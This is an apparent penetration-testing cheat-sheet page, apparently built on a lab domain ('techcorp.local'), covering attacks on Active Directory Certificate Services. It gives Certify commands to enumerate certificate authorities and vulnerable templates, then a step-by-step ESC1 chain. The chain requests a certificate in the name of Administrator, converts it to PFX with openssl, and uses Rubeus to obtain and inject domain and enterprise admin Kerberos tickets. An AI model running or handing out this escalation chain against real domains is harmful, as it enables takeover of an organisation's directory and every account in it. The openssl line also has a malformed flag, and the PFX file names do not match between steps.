ad-cs

Methodology

Binaries

[!INFO] Remember to follow the Binaries methodology

Certify

Enumerate all Certificate Authorities (CA) in the domain:

Certify.exe cas

Enumerate templates:

Certify.exe find

Enumerate vulnerable templates:

Certify.exe find /vulnerable

ESC1

Enroll in template and copy private key to a file:

Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator

Change RSA to PFX:

openssl.exe pkcs12 -in cert.pem - keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out DA.pfx

Request TGT with the PFX:

# Request a TGT and inject it
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password:password /ptt

# Request a enterprise admin TGT and inject it
Rubeus.exe asktgt /user:techcorp.local\Administrator /dc:techcorp-dc.techcorp.local /certificate:C:\AD\Tools\EA.pfx /password:SecretPass@123 /nowrap /ptt

PreviousCross domain attacks Nextchild-to-forest-trust-key

Last updated 1 month ago